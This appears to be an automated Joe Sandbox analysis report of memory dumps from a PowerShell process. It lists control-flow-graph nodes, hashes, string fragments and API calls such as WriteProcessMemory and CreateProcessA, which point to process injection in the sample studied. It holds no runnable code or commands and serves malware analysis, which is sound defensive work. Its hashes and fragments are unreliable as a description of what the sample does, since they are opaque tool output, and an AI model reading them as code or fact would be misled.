6c63989-6c639a9 729->741 731->732 739 6c63e91-6c63ed5 732->739 740 6c63dac-6c63dda 732->740 759 6c63eda 739->759 740->739 746 6c63de0-6c63e52 740->746 741->728 749 6c639af-6c639e2 741->749 764 6c63e54-6c63e6f 746->764 765 6c63e80-6c63e86 746->765 749->728 757 6c639e8-6c63a48 749->757 757->728 767 6c63a4e-6c63aae 757->767 759->759 765->739 767->728 772 6c63ab4-6c63b3d 767->772 772->728 777 6c63b3f-6c63b9c 772->777 777->723
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0Jj$4[,j$4[,j$4[,j$4[,j$4[,j$4[,j$@b,j$@b,j$@b,j$PHj$PHj
                                                                                                                                                                                                                                                        • API String ID: 0-2062262273
                                                                                                                                                                                                                                                        • Opcode ID: 2339584300dbe3a6e4b026e6482ce47d4321de2d113630ec0118d4209dd8d950
                                                                                                                                                                                                                                                        • Instruction ID: 804da0f09dd092aa995e7c655cc421dd50ca77b216ac74a465f35681920ae654
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2339584300dbe3a6e4b026e6482ce47d4321de2d113630ec0118d4209dd8d950
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FC23F74A402189FD754CF14D994B9AFBB2EB89304F1581E9EA09AF341CB71ED82CF85
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: \}'j$\}'j$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-2751452117
                                                                                                                                                                                                                                                        • Opcode ID: 0c5964a0a3f9dd1d7d46e3ef9cd13f5993655ec96b960dbaf4ecb22a2027a169
                                                                                                                                                                                                                                                        • Instruction ID: 53e2f25ef1e8460ff73569ba7575563b5e08fe19f2a83677c014540affe5e6ce
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c5964a0a3f9dd1d7d46e3ef9cd13f5993655ec96b960dbaf4ecb22a2027a169
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D65218B5B0024ADFEB5CDB65C850B6ABBF6AFC5310F24C46AD409DB241DB72C852C792

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1042 6b28f8-6b292a 1046 6b29d1-6b29d9 1042->1046 1047 6b2930-6b2946 1042->1047 1052 6b29db-6b2a1a 1046->1052 1053 6b2a40-6b2a41 1046->1053 1048 6b294b-6b295e 1047->1048 1049 6b2948 1047->1049 1048->1046 1062 6b2960-6b296d 1048->1062 1049->1048 1054 6b2a1c-6b2a23 1052->1054 1055 6b2a60 1052->1055 1057 6b2a43-6b2a50 1053->1057 1058 6b2a52 1053->1058 1059 6b2a25-6b2a32 1054->1059 1060 6b2a34 1054->1060 1061 6b2a63-6b2a9f 1055->1061 1063 6b2a54-6b2a56 1057->1063 1058->1063 1064 6b2a36-6b2a38 1059->1064 1060->1064 1073 6b2b1b-6b2b26 1061->1073 1074 6b2aa1-6b2aaa 1061->1074 1065 6b296f 1062->1065 1066 6b2972-6b2984 1062->1066 1072 6b2a5e 1063->1072 1070 6b2a3a-6b2a3d 1064->1070 1071 6b2a3f 1064->1071 1065->1066 1066->1046 1079 6b2986-6b2990 1066->1079 1070->1072 1071->1053 1072->1061 1076 6b2b28-6b2b2b 1073->1076 1077 6b2b35-6b2b57 1073->1077 1074->1073 1078 6b2aac-6b2ab2 1074->1078 1076->1077 1088 6b2c18-6b2cc4 1077->1088 1089 6b2b5d-6b2b66 1077->1089 1080 6b2ab8-6b2ac5 1078->1080 1081 6b2d4c-6b2db9 1078->1081 1082 6b299e-6b29d0 1079->1082 1083 6b2992-6b2994 1079->1083 1085 6b2b12-6b2b19 1080->1085 1086 6b2ac7-6b2af1 1080->1086 1102 6b2dbb-6b2dc7 1081->1102 1103 6b2dc9-6b2e02 WriteProcessMemory 1081->1103 1083->1082 1085->1073 1085->1078 1100 6b2b0e 1086->1100 1101 6b2af3-6b2af6 1086->1101 1126 6b2cde-6b2cf1 1088->1126 1127 6b2cc6-6b2cdc 1088->1127 1089->1081 1092 6b2b6c-6b2ba1 1089->1092 1110 6b2bbb-6b2bce 1092->1110 1111 6b2ba3-6b2bb9 1092->1111 1100->1085 1107 6b2af8-6b2afb 1101->1107 1108 6b2b02-6b2b0b 1101->1108 1102->1103 1104 6b2e0b-6b2e1f 1103->1104 1105 6b2e04-6b2e0a 1103->1105 1105->1104 1107->1108 1112 6b2bd0-6b2bd7 1110->1112 1111->1112 1115 6b2bd9-6b2bea 1112->1115 1116 6b2bfc 1112->1116 1115->1116 1120 6b2bec-6b2bf5 1115->1120 1116->1088 1120->1116 1128 6b2cf3-6b2cfa 1126->1128 1127->1128 1129 6b2d09 1128->1129 1130 6b2cfc-6b2d02 1128->1130 1129->1081 1130->1129
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57159800504.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $|e$l{e$ze$ze
                                                                                                                                                                                                                                                        • API String ID: 0-3999551689
                                                                                                                                                                                                                                                        • Opcode ID: 9f61cb3393ee7c7ef9c0ca0dd0cb7db7621282a1c0614f3c3981b44ff390fb94
                                                                                                                                                                                                                                                        • Instruction ID: c33fe91fb85417303a5058280b754437f5e4353e3af1f4c7fc2f2021e33b5284
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f61cb3393ee7c7ef9c0ca0dd0cb7db7621282a1c0614f3c3981b44ff390fb94
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84020475A002099FDB15CF98D494ADEBBF2FF88314F248559E849AB361C731ED82CB94

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1131 731d5ad-731d5b0 1132 731d5b2-731d5b4 1131->1132 1133 731d5b6-731d646 1131->1133 1132->1133 1139 731d7e2-731d803 1133->1139 1140 731d64c-731d666 1133->1140 1143 731d832-731d8de 1139->1143 1144 731d805-731d82a 1139->1144 1141 731d695-731d6a2 1140->1141 1142 731d668-731d68d 1140->1142 1145 731d6a8-731d6c9 1141->1145 1146 731d79c-731d7dd 1141->1146 1142->1141 1169 731dce2-731dd0d 1143->1169 1170 731d8e4-731d924 1143->1170 1144->1143 1145->1146 1152 731d6cf-731d79a 1145->1152 1146->1139 1152->1139 1182 731dd12-731dd5f 1169->1182 1170->1169 1177 731d92a-731d94b 1170->1177 1180 731d965-731d967 1177->1180 1181 731d94d-731d953 1177->1181 1186 731d981-731d9a9 1180->1186 1187 731d969-731d96f 1180->1187 1183 731d955 1181->1183 1184 731d957-731d963 1181->1184 1183->1180 1184->1180 1186->1169 1196 731d9af-731d9d0 1186->1196 1188 731d971 1187->1188 1189 731d973-731d97f 1187->1189 1188->1186 1189->1186 1199 731d9d2-731d9d8 1196->1199 1200 731d9ea-731d9ec 1196->1200 1203 731d9da 1199->1203 1204 731d9dc-731d9e8 1199->1204 1201 731da06-731da31 1200->1201 1202 731d9ee-731d9f4 1200->1202 1201->1169 1211 731da37-731da3c 1201->1211 1205 731d9f6 1202->1205 1206 731d9f8-731da04 1202->1206 1203->1200 1204->1200 1205->1201 1206->1201 1212 731da54-731da67 1211->1212 1213 731da3e-731da44 1211->1213 1212->1169 1214 731da6d-731da72 1212->1214 1215 731da46 1213->1215 1216 731da48-731da52 1213->1216 1217 731da74-731da7a 1214->1217 1218 731da8a-731daa2 1214->1218 1215->1212 1216->1212 1220 731da7c 1217->1220 1221 731da7e-731da88 1217->1221 1218->1169 1222 731daa8-731dab3 1218->1222 1220->1218 1221->1218 1223 731dab5-731dabb 1222->1223 1224 731dacb-731dae3 1222->1224 1227 731dabd 1223->1227 1228 731dabf-731dac9 1223->1228 1224->1169 1225 731dae9-731daf0 1224->1225 1229 731daf2-731daf8 1225->1229 1230 731db08-731db5d 1225->1230 1227->1224 1228->1224 1231 731dafa 1229->1231 1232 731dafc-731db06 1229->1232 1230->1169 1238 731db63-731db88 1230->1238 1231->1230 1232->1230 1238->1169 1240 731db8e-731dc95 1238->1240 1240->1169 1253 731dc97-731dcb3 1240->1253 1255 731dcbd-731dce0 1253->1255 1255->1182
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 4[,j$4[,j$4[,j$4[,j$4[,j$4[,j
                                                                                                                                                                                                                                                        • API String ID: 0-981877565
                                                                                                                                                                                                                                                        • Opcode ID: ccb74236d182173ce16c4500903b1de7adb55ec247b5e812d56a6dcd0a7097b8
                                                                                                                                                                                                                                                        • Instruction ID: a84fc29955c0175b996dc11af3502f416f80d5826dbea0eeea23d7a8a44433d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccb74236d182173ce16c4500903b1de7adb55ec247b5e812d56a6dcd0a7097b8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6224074B402198FE758CB14C990BAAB7B2AF89304F14C5E9D90AAF355CB71ED81CB91

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1312 6c306d8-6c30722 1315 6c30724-6c3073a 1312->1315 1316 6c30778-6c307a3 1312->1316 1321 6c30752-6c30760 1315->1321 1322 6c3073c-6c30742 1315->1322 1319 6c307d1-6c307dd 1316->1319 1320 6c307a5-6c307b2 1316->1320 1330 6c30800-6c30804 1319->1330 1331 6c307df-6c307e1 1319->1331 1320->1319 1329 6c307b4-6c307b6 1320->1329 1323 6c30762 1321->1323 1324 6c3076b-6c30775 1321->1324 1325 6c30746-6c30748 1322->1325 1326 6c30744 1322->1326 1323->1324 1325->1321 1326->1321 1335 6c307c4-6c307ce 1329->1335 1336 6c307b8-6c307be 1329->1336 1333 6c30952-6c3095c 1330->1333 1334 6c3080a-6c30830 1330->1334 1331->1330 1332 6c307e3-6c307fe 1331->1332 1332->1330 1343 6c30832 1334->1343 1344 6c30837-6c30839 1334->1344 1336->1335 1337 6c3097e-6c30a11 1336->1337 1343->1344 1345 6c3083b-6c30853 1344->1345 1346 6c30859-6c3085f 1344->1346 1353 6c30887-6c308d7 1345->1353 1354 6c30855-6c30857 1345->1354 1347 6c30861 1346->1347 1348 6c30869-6c30882 1346->1348 1347->1348 1350 6c30934-6c30944 1348->1350 1358 6c30946 1350->1358 1359 6c3094f 1350->1359 1367 6c308d9-6c308fb 1353->1367 1368 6c308fd 1353->1368 1354->1346 1354->1353 1358->1359 1359->1333 1369 6c30900-6c30904 1367->1369 1368->1369 1371 6c30906-6c30908 call 6c314e0 1369->1371 1372 6c3091f-6c30932 1369->1372 1374 6c3090e-6c30914 1371->1374 1372->1350 1374->1372
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Pd=(pd=($s$
                                                                                                                                                                                                                                                        • API String ID: 0-490788296
                                                                                                                                                                                                                                                        • Opcode ID: fe5e3ea12c8e1a7073da78be0e6cd9420f93655ecffa9ca0309a00235fe81064
                                                                                                                                                                                                                                                        • Instruction ID: b76807ec7cdf544cd073813edb3a254de8ea671027317aa8f063c88252243b61
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe5e3ea12c8e1a7073da78be0e6cd9420f93655ecffa9ca0309a00235fe81064
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CA1AC76B01218DFDB45DFA5D554AADBBF2EF89301F2440A9E502AB381EB31DE41CB90

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1376 7313a80-7313aa3 1377 7313aa9-7313aae 1376->1377 1378 7313bbe-7313bf0 1376->1378 1379 7313ab0-7313ab6 1377->1379 1380 7313ac6-7313aca 1377->1380 1386 7313c00 1378->1386 1387 7313bf2-7313bfe 1378->1387 1382 7313ab8 1379->1382 1383 7313aba-7313ac4 1379->1383 1384 7313ad0-7313ad2 1380->1384 1385 7313b6e-7313b78 1380->1385 1382->1380 1383->1380 1390 7313af1 1384->1390 1391 7313ad4-7313aef 1384->1391 1388 7313b86-7313b8c 1385->1388 1389 7313b7a-7313b83 1385->1389 1393 7313c02-7313c04 1386->1393 1387->1393 1394 7313b92-7313b9e 1388->1394 1395 7313b8e-7313b90 1388->1395 1396 7313af3-7313af5 1390->1396 1391->1396 1397 7313c06-7313c08 1393->1397 1398 7313c7e-7313c88 1393->1398 1399 7313ba0-7313bbb 1394->1399 1395->1399 1396->1385 1401 7313af7 1396->1401 1404 7313c18 1397->1404 1405 7313c0a-7313c16 1397->1405 1402 7313c93-7313c99 1398->1402 1403 7313c8a-7313c90 1398->1403 1408 7313b01-7313b05 1401->1408 1410 7313c9b-7313c9d 1402->1410 1411 7313c9f-7313cab 1402->1411 1409 7313c1a-7313c1c 1404->1409 1405->1409 1413 7313b07-7313b0d 1408->1413 1414 7313b1f-7313b6b 1408->1414 1409->1398 1415 7313c1e-7313c24 1409->1415 1416 7313cad-7313cc6 1410->1416 1411->1416 1418 7313b11-7313b1d 1413->1418 1419 7313b0f 1413->1419 1420 7313c32-7313c3b 1415->1420 1421 7313c26-7313c28 1415->1421 1418->1414 1419->1414 1425 7313c49-7313c66 1420->1425 1426 7313c3d-7313c3f 1420->1426 1421->1420 1431 7313cc9-7313cce 1425->1431 1432 7313c68-7313c78 1425->1432 1426->1425 1431->1432 1432->1398
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-228363525
                                                                                                                                                                                                                                                        • Opcode ID: f9a899fe7fad85b183f7949536c24323d0f13c3c630852c5ff47fbed530ce27d
                                                                                                                                                                                                                                                        • Instruction ID: dbabb5a7f3ae614228e0c32b54dfd1d4c7a6e368f9e36ae2ab9a89c96f3bd68f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9a899fe7fad85b183f7949536c24323d0f13c3c630852c5ff47fbed530ce27d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A513DF1704316CFEB299A7A944036ABBE6AFC6310F24847ED44ECB641EA71C845C7A1

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1434 7310488-73104ab 1435 73104b1-73104b6 1434->1435 1436 7310650-7310670 1434->1436 1437 73104b8-73104be 1435->1437 1438 73104ce-73104d2 1435->1438 1449 7310672-73106a5 1436->1449 1450 731061f 1436->1450 1442 73104c0 1437->1442 1443 73104c2-73104cc 1437->1443 1439 73104d8-73104da 1438->1439 1440 73105fd-7310607 1438->1440 1444 73104ea 1439->1444 1445 73104dc-73104e8 1439->1445 1447 7310615-731061b 1440->1447 1448 7310609-7310612 1440->1448 1442->1438 1443->1438 1451 73104ec-73104ee 1444->1451 1445->1451 1453 7310621-731062d 1447->1453 1454 731061d 1447->1454 1456 731062f-731064d 1450->1456 1451->1440 1455 73104f4-7310513 1451->1455 1453->1456 1454->1450 1465 7310532 1455->1465 1466 7310515-7310530 1455->1466 1467 7310534-7310536 1465->1467 1466->1467 1467->1440 1469 731053c-7310540 1467->1469 1469->1440 1470 7310546-7310565 1469->1470 1474 7310567-731056d 1470->1474 1475 731057d-7310582 1470->1475 1476 7310571-7310573 1474->1476 1477 731056f 1474->1477 1478 7310589-731058b 1475->1478 1476->1475 1477->1475 1479 73105a3-73105fa 1478->1479 1480 731058d-7310593 1478->1480 1481 7310595 1480->1481 1482 7310597-7310599 1480->1482 1481->1479 1482->1479
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-228363525
                                                                                                                                                                                                                                                        • Opcode ID: e2a74adc72ae26de5e1a11d4f1801535b8398828220238dc6e64a1d85437ce0b
                                                                                                                                                                                                                                                        • Instruction ID: 803c6b7a21112b84007313d98a395d5e223a60ec9bcd75146e97db490069b84a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2a74adc72ae26de5e1a11d4f1801535b8398828220238dc6e64a1d85437ce0b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B35119F1B093058FEB5D9A74982076E7BE69FC6210F54806AD449DF182DE75C8C1C7A2

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1484 7311bc8-7311bda 1485 7311be0-7311bf1 1484->1485 1486 7311c9a-7311d14 1484->1486 1490 7311bf3-7311bf9 1485->1490 1491 7311c0b-7311c28 1485->1491 1503 7311d40-7311d45 1486->1503 1504 7311d16-7311d24 1486->1504 1492 7311bfb 1490->1492 1493 7311bfd-7311c09 1490->1493 1491->1486 1497 7311c2a-7311c4c 1491->1497 1492->1491 1493->1491 1501 7311c66-7311c7e 1497->1501 1502 7311c4e-7311c54 1497->1502 1509 7311c80-7311c82 1501->1509 1510 7311c8c-7311c97 1501->1510 1505 7311c56 1502->1505 1506 7311c58-7311c64 1502->1506 1503->1504 1513 7311d2b-7311d3a 1504->1513 1505->1501 1506->1501 1509->1510 1513->1503
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P0*j$P0*j
                                                                                                                                                                                                                                                        • API String ID: 0-3391056851
                                                                                                                                                                                                                                                        • Opcode ID: d1a9265907798b65a6344f318fdc27998dda4534bae6813edfbdb395bf8f8550
                                                                                                                                                                                                                                                        • Instruction ID: f63fcb09068bb03535fc2526a52885afcd966e56ac3d19edf08a0861888474c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1a9265907798b65a6344f318fdc27998dda4534bae6813edfbdb395bf8f8550
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F4161717103589FE7648B648854BAEBFF5EF85710F15C05AEA89EF382C9719C01C3A5

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1928 7316deb-7316e1f 1931 7316e21-7316e26 1928->1931 1932 7316e2b-7316e64 1928->1932 1931->1932 1937 7316e66-7316e6b 1932->1937 1938 7316e6d 1932->1938 1940 7316e72-7316e8c 1937->1940 1938->1940 1941 7316ebb-7316ef8 1940->1941 1942 7316e8e-7316eb3 1940->1942 1946 7316f10-7316f2f 1941->1946 1947 7316efa-7316f02 1941->1947 1942->1941 1950 7316f31-7316f39 1946->1950 1951 7316f47-7316fa4 1946->1951 1947->1946 1950->1951 1961 73165c9-73165d1 1951->1961 1962 73165df-731660a 1951->1962 1961->1962 1964 7316645-731665d 1962->1964 1965 731660c-731663f 1962->1965 1967 7316675-73166b9 1964->1967 1968 731665f-7316667 1964->1968 1965->1964 1974 73166d1-7316761 1967->1974 1975 73166bb-73166c3 1967->1975 1968->1967 1984 7316763 1974->1984 1985 731676a-731678b 1974->1985 1975->1974 1984->1985 1986 7316960-7316981 1984->1986 1987 7316aaa-7316acb 1984->1987 1988 73167ba-7316887 1985->1988 1989 731678d-73167b2 1985->1989 1990 73169b0-7316aa3 1986->1990 1991 7316983-73169a8 1986->1991 1993 7316afa-7316b12 1987->1993 1994 7316acd-7316af2 1987->1994 2065 731688a call 7313cf0 1988->2065 2066 731688a call 7313cd2 1988->2066 1989->1988 1990->1987 1991->1990 1998 7316b14-7316b1c 1993->1998 1999 7316b2a-7316b4d 1993->1999 1994->1993 1998->1999 2007 7316b65-7316baf 1999->2007 2008 7316b4f-7316b57 1999->2008 2017 7316bb1-7316bb9 2007->2017 2018 7316bc7-7316bf6 2007->2018 2008->2007 2017->2018 2063 7316bf9 call 7313a61 2018->2063 2064 7316bf9 call 7313a80 2018->2064 2025 7316bfb-7316c1f 2035 7316c25-7316c3f 2025->2035 2036 7316de6 2025->2036 2029 731688c-7316959 2029->1986 2037 7316c41-7316c66 2035->2037 2038 7316c6e-7316c86 2035->2038 2036->1940 2037->2038 2044 7316c88-7316c90 2038->2044 2045 7316c9e-7316cc1 2038->2045 2044->2045 2049 7316cc3-7316ccb 2045->2049 2050 7316cd9-7316d60 2045->2050 2049->2050 2050->2036 2063->2025 2064->2025 2065->2029 2066->2029
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +j
                                                                                                                                                                                                                                                        • API String ID: 0-1387894366
                                                                                                                                                                                                                                                        • Opcode ID: a15fc508729a9b197ae0d35f670a37896246fe9a833f77a3cee2866a48cfcea3
                                                                                                                                                                                                                                                        • Instruction ID: b17f35777680e539ba3b9bc4f952a109ffa7b08d3f4d126d85549f107a15e5de
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a15fc508729a9b197ae0d35f670a37896246fe9a833f77a3cee2866a48cfcea3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E4228B4A00218CFEB68CB54C995B69BBB2AF89314F15C1D9D90D9B356CB72EC81CF41

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2371 6c9e12a-6c9e1a0 2374 6c9e1d9-6c9e1f9 2371->2374 2375 6c9e1a2-6c9e1ac 2371->2375 2382 6c9e1fb-6c9e205 2374->2382 2383 6c9e232-6c9e26c 2374->2383 2375->2374 2376 6c9e1ae-6c9e1b0 2375->2376 2377 6c9e1d3-6c9e1d6 2376->2377 2378 6c9e1b2-6c9e1bc 2376->2378 2377->2374 2380 6c9e1be 2378->2380 2381 6c9e1c0-6c9e1cf 2378->2381 2380->2381 2381->2381 2384 6c9e1d1 2381->2384 2382->2383 2385 6c9e207-6c9e209 2382->2385 2389 6c9e26e-6c9e278 2383->2389 2390 6c9e2a5-6c9e31a CreateProcessA 2383->2390 2384->2377 2387 6c9e20b-6c9e215 2385->2387 2388 6c9e22c-6c9e22f 2385->2388 2391 6c9e219-6c9e228 2387->2391 2392 6c9e217 2387->2392 2388->2383 2389->2390 2393 6c9e27a-6c9e27c 2389->2393 2402 6c9e31c-6c9e322 2390->2402 2403 6c9e323-6c9e36b 2390->2403 2391->2391 2394 6c9e22a 2391->2394 2392->2391 2395 6c9e29f-6c9e2a2 2393->2395 2396 6c9e27e-6c9e288 2393->2396 2394->2388 2395->2390 2398 6c9e28a 2396->2398 2399 6c9e28c-6c9e29b 2396->2399 2398->2399 2399->2399 2400 6c9e29d 2399->2400 2400->2395 2402->2403 2408 6c9e37b-6c9e37f 2403->2408 2409 6c9e36d-6c9e371 2403->2409 2411 6c9e38f-6c9e393 2408->2411 2412 6c9e381-6c9e385 2408->2412 2409->2408 2410 6c9e373 2409->2410 2410->2408 2413 6c9e3a3 2411->2413 2414 6c9e395-6c9e399 2411->2414 2412->2411 2415 6c9e387 2412->2415 2417 6c9e3a4 2413->2417 2414->2413 2416 6c9e39b 2414->2416 2415->2411 2416->2413 2417->2417
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C9E30A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                                                                        • Opcode ID: f27cf4667cb98090c4e2ded0f7b227dcc1e8ad3b49ab46114d6d9596b0985049
                                                                                                                                                                                                                                                        • Instruction ID: 99ed81b41f17f20c39387020aa0d04393ec2104f256c75113ed745570671cf57
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f27cf4667cb98090c4e2ded0f7b227dcc1e8ad3b49ab46114d6d9596b0985049
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F814471D006099FDF50CFA9C8897AEBBF2FF48310F14852AE815A7290DB749981CF91

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
